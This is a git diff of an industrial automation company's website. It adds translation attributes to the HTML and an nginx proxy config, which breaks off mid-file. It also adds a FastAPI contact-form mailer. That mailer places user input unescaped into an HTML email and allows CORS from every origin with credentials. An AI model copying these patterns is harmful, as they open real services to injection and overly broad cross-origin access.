<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
|
||||||
|
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-wave-square text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
|
||||||
|
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i7.title">Vibration Monitors</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i7.desc">Accelerometers and velocity sensors for predictive maintenance</p>
|
||||||
|
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Frequency: 0-20 kHz</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Wireless capability</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> FFT analysis ready</div></div>
|
||||||
|
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
|
||||||
|
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-microchip text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
|
||||||
|
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i8.title">Smart Data Loggers</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i8.desc">IoT-enabled data acquisition units with cloud connectivity</p>
|
||||||
|
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> 16-32 analog channels</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> 4G/WiFi/Ethernet</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Local data storage</div></div>
|
||||||
|
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="mt-20 p-12 bg-gradient-to-r from-blue-600 to-blue-700 rounded-[2.5rem] text-white text-center">
|
||||||
|
<h3 class="text-3xl font-semibold mb-4 font-premium" data-i18n="inst.custom.title">Custom Integration Available</h3>
|
||||||
|
<p class="text-white/90 mb-8 max-w-2xl mx-auto font-light" data-i18n="inst.custom.desc">All instruments integrate seamlessly with our DCS and SCADA platforms.</p>
|
||||||
|
<a href="#contact" class="bg-white text-blue-600 hover:bg-slate-100 px-8 py-3 rounded-2xl font-bold transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="inst.custom.btn">Request Custom Configuration</a>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
|
||||||
<!-- SERVICES SECTION -->
|
<!-- SERVICES SECTION -->
|
||||||
<section id="services" class="py-32 bg-white">
|
<section id="services" class="py-32 bg-white">
|
||||||
<div class="container mx-auto px-6">
|
<div class="container mx-auto px-6">
|
||||||
<div class="text-center max-w-3xl mx-auto mb-24">
|
<div class="text-center max-w-3xl mx-auto mb-24">
|
||||||
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial">Our Capabilities</h2>
|
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="svc.badge">Our Capabilities</h2>
|
||||||
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium">World-Class Automation</h3>
|
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="svc.title">World-Class Automation</h3>
|
||||||
<p class="text-slate-500 text-lg leading-relaxed font-light">
|
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="svc.desc">Specialized engineering for complex physical operations through advanced data integration and distributed control systems.</p>
|
||||||
Specialized engineering for complex physical operations through advanced data integration and distributed control systems.
|
|
||||||
</p>
|
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
<div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-8">
|
<div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-8">
|
||||||
<!-- DCS -->
|
|
||||||
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
|
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
|
||||||
<div class="h-56 overflow-hidden">
|
<div class="h-56 overflow-hidden"><img src="https://images.unsplash.com/photo-1518770660439-4636190af475?auto=format&fit=crop&q=80&w=800" alt="DCS" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
|
||||||
<img src="https://images.unsplash.com/photo-1518770660439-4636190af475?auto=format&fit=crop&q=80&w=800" alt="DCS" class="service-image w-full h-full object-cover grayscale transition-all duration-700">
|
|
||||||
</div>
|
|
||||||
<div class="p-10 flex-grow flex flex-col">
|
<div class="p-10 flex-grow flex flex-col">
|
||||||
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500">
|
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-network-wired text-blue-600 group-hover:text-white text-xl"></i></div>
|
||||||
<i class="fas fa-network-wired text-blue-600 group-hover:text-white text-xl"></i>
|
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s1.title">DCS Integration</h4>
|
||||||
</div>
|
<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s1.desc">Redundant control architectures for utility-scale industries including power and chemical plants.</p>
|
||||||
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium">DCS Integration</h4>
|
<a href="#dcs" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s1.link">Learn More <i class="fas fa-arrow-right"></i></a>
|
||||||
<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow">
|
|
||||||
Redundant control architectures for utility-scale industries including power and chemical plants.
|
|
||||||
</p>
|
|
||||||
<a href="#" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3">
|
|
||||||
Technical Specs <i class="fas fa-arrow-right"></i>
|
|
||||||
</a>
|
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
<!-- SCADA -->
|
|
||||||
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
|
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
|
||||||
<div class="h-56 overflow-hidden">
|
<div class="h-56 overflow-hidden"><img src="https://images.unsplash.com/photo-1551288049-bebda4e38f71?auto=format&fit=crop&q=80&w=800" alt="SCADA" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
|
||||||
<img src="https://images.unsplash.com/photo-1551288049-bebda4e38f71?auto=format&fit=crop&q=80&w=800" alt="SCADA" class="service-image w-full h-full object-cover grayscale transition-all duration-700">
|
|
||||||
</div>
|
|
||||||
<div class="p-10 flex-grow flex flex-col">
|
<div class="p-10 flex-grow flex flex-col">
|
||||||
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500">
|
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-chart-line text-blue-600 group-hover:text-white text-xl"></i></div>
|
||||||
<i class="fas fa-chart-line text-blue-600 group-hover:text-white text-xl"></i>
|
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s2.title">SCADA Design</h4>
|
||||||
</div>
|
<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s2.desc">Real-time monitoring platforms with advanced HMI and secure remote access protocols.</p>
|
||||||
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium">SCADA Design</h4>
|
<a href="#services" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s2.link">Case Studies <i class="fas fa-arrow-right"></i></a>
|
||||||
<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow">
|
|
||||||
Real-time monitoring platforms with advanced HMI and secure remote access protocols.
|
|
||||||
</p>
|
|
||||||
<a href="#" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3">
|
|
||||||
Case Studies <i class="fas fa-arrow-right"></i>
|
|
||||||
</a>
|
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
<!-- Database -->
|
|
||||||
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
|
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
|
||||||
<div class="h-56 overflow-hidden">
|
<div class="h-56 overflow-hidden"><img src="https://images.unsplash.com/photo-1558494949-ef010cbdcc48?auto=format&fit=crop&q=80&w=800" alt="Historian" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
|
||||||
<img src="https://images.unsplash.com/photo-1558494949-ef010cbdcc48?auto=format&fit=crop&q=80&w=800" alt="Historian" class="service-image w-full h-full object-cover grayscale transition-all duration-700">
|
|
||||||
</div>
|
|
||||||
<div class="p-10 flex-grow flex flex-col">
|
<div class="p-10 flex-grow flex flex-col">
|
||||||
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500">
|
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-database text-blue-600 group-hover:text-white text-xl"></i></div>
|
||||||
<i class="fas fa-database text-blue-600 group-hover:text-white text-xl"></i>
|
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s3.title">Data Historians</h4>
|
||||||
</div>
|
<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s3.desc">Mission-critical SQL infrastructure optimized for massive industrial time-series data storage.</p>
|
||||||
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium">Data Historians</h4>
|
<a href="#dbsvr" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s3.link">Data Security <i class="fas fa-arrow-right"></i></a>
|
||||||
<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow">
|
|
||||||
Mission-critical SQL infrastructure optimized for massive industrial time-series data storage.
|
|
||||||
</p>
|
|
||||||
<a href="#" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3">
|
|
||||||
Data Security <i class="fas fa-arrow-right"></i>
|
|
||||||
</a>
|
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
<!-- Instruments -->
|
|
||||||
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
|
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
|
||||||
<div class="h-56 overflow-hidden">
|
<div class="h-56 overflow-hidden"><img src="https://images.unsplash.com/photo-1531482615713-2afd69097998?auto=format&fit=crop&q=80&w=800" alt="Instruments" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
|
||||||
<img src="https://images.unsplash.com/photo-1531482615713-2afd69097998?auto=format&fit=crop&q=80&w=800" alt="Instruments" class="service-image w-full h-full object-cover grayscale transition-all duration-700">
|
|
||||||
</div>
|
|
||||||
<div class="p-10 flex-grow flex flex-col">
|
<div class="p-10 flex-grow flex flex-col">
|
||||||
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500">
|
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-8 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-gauge-high text-blue-600 group-hover:text-white text-xl"></i></div>
|
||||||
<i class="fas fa-gauge-high text-blue-600 group-hover:text-white text-xl"></i>
|
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s4.title">Control Instruments</h4>
|
||||||
</div>
|
<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s4.desc">Smart field sensors for flow, pressure, and temperature with high-accuracy calibration.</p>
|
||||||
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium">Control Instruments</h4>
|
<a href="#products" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s4.link">Product Catalog <i class="fas fa-arrow-right"></i></a>
|
||||||
<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow">
|
|
||||||
Smart field sensors for flow, pressure, and temperature with high-accuracy calibration.
|
|
||||||
</p>
|
|
||||||
<a href="#" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3">
|
|
||||||
Product Catalog <i class="fas fa-arrow-right"></i>
|
|
||||||
</a>
|
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
@@ -209,31 +350,25 @@
|
|||||||
<div class="container mx-auto px-6">
|
<div class="container mx-auto px-6">
|
||||||
<div class="grid lg:grid-cols-2 gap-20 items-center">
|
<div class="grid lg:grid-cols-2 gap-20 items-center">
|
||||||
<div class="relative">
|
<div class="relative">
|
||||||
<div class="aspect-square rounded-[3rem] overflow-hidden shadow-2xl">
|
<div class="aspect-square rounded-[3rem] overflow-hidden shadow-2xl"><img src="https://images.unsplash.com/photo-1504384308090-c894fdcc538d?auto=format&fit=crop&q=80&w=1000" alt="About Hanmo" class="w-full h-full object-cover"></div>
|
||||||
<img src="https://images.unsplash.com/photo-1504384308090-c894fdcc538d?auto=format&fit=crop&q=80&w=1000" alt="About Hanmo" class="w-full h-full object-cover">
|
|
||||||
</div>
|
|
||||||
<div class="absolute -bottom-10 -right-10 p-10 bg-blue-600 text-white rounded-[2rem] shadow-2xl max-w-xs">
|
<div class="absolute -bottom-10 -right-10 p-10 bg-blue-600 text-white rounded-[2rem] shadow-2xl max-w-xs">
|
||||||
<div class="text-6xl font-extralight mb-4 font-premium">15+</div>
|
<div class="text-6xl font-extralight mb-4 font-premium">15+</div>
|
||||||
<div class="text-xs font-bold uppercase tracking-widest leading-loose">Years of Industrial Excellence</div>
|
<div class="text-xs font-bold uppercase tracking-widest leading-loose" data-i18n="about.years">Years of Industrial Excellence</div>
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
<div class="pt-10">
|
<div class="pt-10">
|
||||||
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial">About Hanmo</h2>
|
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="about.badge">About Hanmo</h2>
|
||||||
<h3 class="text-4xl md:text-5xl font-light text-slate-900 mb-8 premium-kerning font-premium">Trusted Partner in Industrial Automation</h3>
|
<h3 class="text-4xl md:text-5xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="about.title">Trusted Partner in Industrial Automation</h3>
|
||||||
<p class="text-slate-500 leading-relaxed mb-6 font-light">
|
<p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="about.p1">Since our founding, Hanmo Control & Network Co., Ltd. has been at the forefront of industrial automation engineering.</p>
|
||||||
Since our founding, Hanmo Control & Network Co., Ltd. has been at the forefront of industrial automation engineering. We specialize in designing, implementing, and maintaining mission-critical control systems for the world's most demanding industries.
|
<p class="text-slate-500 leading-relaxed mb-12 font-light" data-i18n="about.p2">Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking.</p>
|
||||||
</p>
|
|
||||||
<p class="text-slate-500 leading-relaxed mb-12 font-light">
|
|
||||||
Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking, ensuring your operations run with unmatched precision and reliability.
|
|
||||||
</p>
|
|
||||||
<div class="grid grid-cols-2 gap-6">
|
<div class="grid grid-cols-2 gap-6">
|
||||||
<div class="p-6 bg-white rounded-2xl border border-slate-100 shadow-sm">
|
<div class="p-6 bg-white rounded-2xl border border-slate-100 shadow-sm">
|
||||||
<div class="text-3xl font-light text-slate-900 mb-1 font-premium">ISO 9001</div>
|
<div class="text-3xl font-light text-slate-900 mb-1 font-premium">ISO 9001</div>
|
||||||
<div class="text-xs text-slate-400 uppercase tracking-widest font-industrial font-semibold">Certified</div>
|
<div class="text-xs text-slate-400 uppercase tracking-widest font-industrial font-semibold" data-i18n="about.cert">Certified</div>
|
||||||
</div>
|
</div>
|
||||||
<div class="p-6 bg-white rounded-2xl border border-slate-100 shadow-sm">
|
<div class="p-6 bg-white rounded-2xl border border-slate-100 shadow-sm">
|
||||||
<div class="text-3xl font-light text-slate-900 mb-1 font-premium">24 / 7</div>
|
<div class="text-3xl font-light text-slate-900 mb-1 font-premium">24 / 7</div>
|
||||||
<div class="text-xs text-slate-400 uppercase tracking-widest font-industrial font-semibold">Support</div>
|
<div class="text-xs text-slate-400 uppercase tracking-widest font-industrial font-semibold" data-i18n="about.support">Support</div>
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
@@ -245,23 +380,20 @@
|
|||||||
<section id="contact" class="py-32 bg-slate-900">
|
<section id="contact" class="py-32 bg-slate-900">
|
||||||
<div class="container mx-auto px-6">
|
<div class="container mx-auto px-6">
|
||||||
<div class="text-center max-w-3xl mx-auto mb-20">
|
<div class="text-center max-w-3xl mx-auto mb-20">
|
||||||
<h2 class="text-blue-400 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial">Get In Touch</h2>
|
<h2 class="text-blue-400 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="contact.badge">Get In Touch</h2>
|
||||||
<h3 class="text-4xl md:text-6xl font-light text-white mb-8 premium-kerning font-premium">Start Your Project</h3>
|
<h3 class="text-4xl md:text-6xl font-light text-white mb-8 premium-kerning font-premium" data-i18n="contact.title">Start Your Project</h3>
|
||||||
<p class="text-slate-400 text-lg leading-relaxed font-light">
|
<p class="text-slate-400 text-lg leading-relaxed font-light" data-i18n="contact.desc">Contact our engineering team for a detailed consultation and project assessment.</p>
|
||||||
Contact our engineering team for a detailed consultation and project assessment.
|
|
||||||
</p>
|
|
||||||
</div>
|
</div>
|
||||||
<div class="max-w-2xl mx-auto">
|
<div class="max-w-2xl mx-auto">
|
||||||
<div class="grid grid-cols-1 gap-5">
|
<div class="grid grid-cols-1 gap-5">
|
||||||
<div class="grid grid-cols-2 gap-5">
|
<div class="grid grid-cols-2 gap-5">
|
||||||
<input type="text" placeholder="Full Name" class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors font-light">
|
<input type="text" id="contact-name" data-i18n="contact.name" data-i18n-type="placeholder" placeholder="Full Name" class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors font-light">
|
||||||
<input type="email" placeholder="Email Address" class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors font-light">
|
<input type="email" id="contact-email" data-i18n="contact.email" data-i18n-type="placeholder" placeholder="Email Address" class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors font-light">
|
||||||
</div>
|
</div>
|
||||||
<input type="text" placeholder="Company Name" class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors font-light">
|
<input type="text" id="contact-company" data-i18n="contact.company" data-i18n-type="placeholder" placeholder="Company Name" class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors font-light">
|
||||||
<textarea rows="5" placeholder="Describe your project requirements..." class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors resize-none font-light"></textarea>
|
<textarea rows="5" id="contact-message" data-i18n="contact.msg" data-i18n-type="placeholder" placeholder="Describe your project requirements..." class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors resize-none font-light"></textarea>
|
||||||
<button class="bg-blue-600 hover:bg-blue-700 text-white py-5 rounded-2xl font-bold transition-all hover:-translate-y-0.5 font-industrial text-xs tracking-widest uppercase shadow-2xl">
|
<button id="contact-submit" class="bg-blue-600 hover:bg-blue-700 text-white py-5 rounded-2xl font-bold transition-all hover:-translate-y-0.5 font-industrial text-xs tracking-widest uppercase shadow-2xl" data-i18n="contact.btn">Send Message</button>
|
||||||
Send Message
|
<div id="contact-status" class="hidden p-5 rounded-2xl text-center font-light"></div>
|
||||||
</button>
|
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
@@ -278,10 +410,14 @@
|
|||||||
<span class="text-white font-bold font-industrial text-sm">HANMO</span>
|
<span class="text-white font-bold font-industrial text-sm">HANMO</span>
|
||||||
<span class="text-slate-500 text-xs font-industrial">Control & Network Co., Ltd.</span>
|
<span class="text-slate-500 text-xs font-industrial">Control & Network Co., Ltd.</span>
|
||||||
</div>
|
</div>
|
||||||
<p class="text-slate-600 text-xs font-light">© 2024 Hanmo Control & Network Co., Ltd. All rights reserved.</p>
|
<p class="text-slate-600 text-xs font-light" data-i18n="footer.copy">© 2024 Hanmo Control & Network Co., Ltd. All rights reserved.</p>
|
||||||
</div>
|
</div>
|
||||||
</footer>
|
</footer>
|
||||||
|
|
||||||
|
<!-- EmailJS SDK -->
|
||||||
|
<script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
|
||||||
|
<!-- i18n 먼저 로드 후 script.js -->
|
||||||
|
<script src="assets/js/i18n.js"></script>
|
||||||
<script src="assets/js/script.js"></script>
|
<script src="assets/js/script.js"></script>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|||||||
@@ -1 +1 @@
|
|||||||
{"cpu_temp": "41", "nvme_temp": "34", "uptime_days": 2, "last_update": "23:00:01"}
|
{"cpu_temp": "39", "nvme_temp": "33", "uptime_days": 2, "last_update": "11:11:01"}
|
||||||
137
mail_contact.py
Normal file
137
mail_contact.py
Normal file
@@ -0,0 +1,137 @@
|
|||||||
|
from fastapi import FastAPI, HTTPException
|
||||||
|
from pydantic import BaseModel, EmailStr, validator
|
||||||
|
from fastapi.middleware.cors import CORSMiddleware
|
||||||
|
import smtplib
|
||||||
|
from email.mime.text import MIMEText
|
||||||
|
from email.mime.multipart import MIMEMultipart
|
||||||
|
import os
|
||||||
|
from typing import Optional
|
||||||
|
|
||||||
|
app = FastAPI()
|
||||||
|
|
||||||
|
# CORS 설정
|
||||||
|
app.add_middleware(
|
||||||
|
CORSMiddleware,
|
||||||
|
allow_origins=["*"],
|
||||||
|
allow_credentials=True,
|
||||||
|
allow_methods=["*"],
|
||||||
|
allow_headers=["*"],
|
||||||
|
)
|
||||||
|
|
||||||
|
class ContactForm(BaseModel):
|
||||||
|
name: str
|
||||||
|
email: EmailStr
|
||||||
|
company: str
|
||||||
|
message: str
|
||||||
|
|
||||||
|
@validator('name')
|
||||||
|
def name_not_empty(cls, v):
|
||||||
|
if not v or len(v.strip()) == 0:
|
||||||
|
raise ValueError('Full Name is required')
|
||||||
|
return v.strip()
|
||||||
|
|
||||||
|
@validator('company')
|
||||||
|
def company_not_empty(cls, v):
|
||||||
|
if not v or len(v.strip()) == 0:
|
||||||
|
raise ValueError('Company Name is required')
|
||||||
|
return v.strip()
|
||||||
|
|
||||||
|
@validator('message')
|
||||||
|
def message_valid(cls, v):
|
||||||
|
if not v or len(v.strip()) == 0:
|
||||||
|
raise ValueError('Project description is required')
|
||||||
|
if len(v) > 5000:
|
||||||
|
raise ValueError('Message is too long (max 5000 characters)')
|
||||||
|
return v.strip()
|
||||||
|
|
||||||
|
@app.post("/api/contact")
|
||||||
|
async def send_contact_email(form: ContactForm):
|
||||||
|
"""Contact form email handler"""
|
||||||
|
try:
|
||||||
|
# SMTP 설정 - mailcow Postfix 서버
|
||||||
|
# Docker 네트워크 내에서는 서비스 이름으로 접근
|
||||||
|
smtp_server = "mailcowdockerized_postfix-mailcow_1"
|
||||||
|
smtp_port = 25
|
||||||
|
|
||||||
|
print(f"Attempting to connect to SMTP: {smtp_server}:{smtp_port}")
|
||||||
|
|
||||||
|
# 메시지 구성
|
||||||
|
msg = MIMEMultipart('alternative')
|
||||||
|
msg['Subject'] = f"[Contact Form] {form.name} - {form.company}"
|
||||||
|
msg['From'] = "contact@hanmocnn.co.kr"
|
||||||
|
msg['To'] = "windpacer@hanmocnn.co.kr"
|
||||||
|
msg['Reply-To'] = form.email
|
||||||
|
|
||||||
|
# 텍스트 본문
|
||||||
|
text_body = f"""
|
||||||
|
New contact form submission:
|
||||||
|
|
||||||
|
Name: {form.name}
|
||||||
|
Email: {form.email}
|
||||||
|
Company: {form.company}
|
||||||
|
Message:
|
||||||
|
{form.message}
|
||||||
|
|
||||||
|
---
|
||||||
|
Submitted from Hanmo Contact Form
|
||||||
|
"""
|
||||||
|
|
||||||
|
# HTML 본문
|
||||||
|
html_body = f"""
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<h3>New contact form submission:</h3>
|
||||||
|
<p><strong>Name:</strong> {form.name}</p>
|
||||||
|
<p><strong>Email:</strong> {form.email}</p>
|
||||||
|
<p><strong>Company:</strong> {form.company}</p>
|
||||||
|
<p><strong>Message:</strong></p>
|
||||||
|
<pre>{form.message}</pre>
|
||||||
|
<hr>
|
||||||
|
<p><em>Submitted from Hanmo Contact Form</em></p>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
"""
|
||||||
|
|
||||||
|
part1 = MIMEText(text_body, 'plain')
|
||||||
|
part2 = MIMEText(html_body, 'html')
|
||||||
|
msg.attach(part1)
|
||||||
|
msg.attach(part2)
|
||||||
|
|
||||||
|
# SMTP 연결 및 메일 전송
|
||||||
|
print(f"Connecting to SMTP server...")
|
||||||
|
with smtplib.SMTP(smtp_server, smtp_port, timeout=10) as server:
|
||||||
|
print(f"Connected! Sending email...")
|
||||||
|
server.sendmail(
|
||||||
|
"contact@hanmocnn.co.kr",
|
||||||
|
"windpacer@hanmocnn.co.kr",
|
||||||
|
msg.as_string()
|
||||||
|
)
|
||||||
|
print(f"Email sent successfully!")
|
||||||
|
|
||||||
|
return {
|
||||||
|
"success": True,
|
||||||
|
"message": "Your message has been sent successfully. We will get back to you soon."
|
||||||
|
}
|
||||||
|
|
||||||
|
return {
|
||||||
|
"success": True,
|
||||||
|
"message": "Your message has been sent successfully. We will get back to you soon."
|
||||||
|
}
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
import traceback
|
||||||
|
print(f"Error sending email: {str(e)}")
|
||||||
|
print(traceback.format_exc())
|
||||||
|
raise HTTPException(
|
||||||
|
status_code=500,
|
||||||
|
detail="Failed to send email. Please try again later."
|
||||||
|
)
|
||||||
|
|
||||||
|
@app.get("/health")
|
||||||
|
async def health_check():
|
||||||
|
"""Health check endpoint"""
|
||||||
|
return {"status": "ok"}
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
import uvicorn
|
||||||
|
uvicorn.run(app, host="0.0.0.0", port=8001)
|
||||||
28
nginx-reverse-proxy.conf
Normal file
28
nginx-reverse-proxy.conf
Normal file
@@ -0,0 +1,28 @@
|
|||||||
|
upstream hanmo_backend {
|
||||||
|
server hanmo-home:80;
|
||||||
|
}
|
||||||
|
|
||||||
|
server {
|
||||||
|
listen 80;
|
||||||
|
listen [::]:80;
|
||||||
|
server_name www.hanmocnn.co.kr hanmocnn.co.kr;
|
||||||
|
|
||||||
|
location / {
|
||||||
|
proxy_pass http://hanmo_backend;
|
||||||
|
proxy_set_header Host $host;
|
||||||
|
proxy_set_header X-Real-IP $remote_addr;
|
||||||
|
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
|
||||||
|
proxy_set_header X-Forwarded-Proto $scheme;
|
||||||
|
proxy_http_version 1.1;
|
||||||
|
proxy_set_header Connection "";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
server {
|
||||||
|
listen 80 default_server;
|
||||||
|
listen [::]:80 default_server;
|
||||||
|
|
||||||
|
location / {
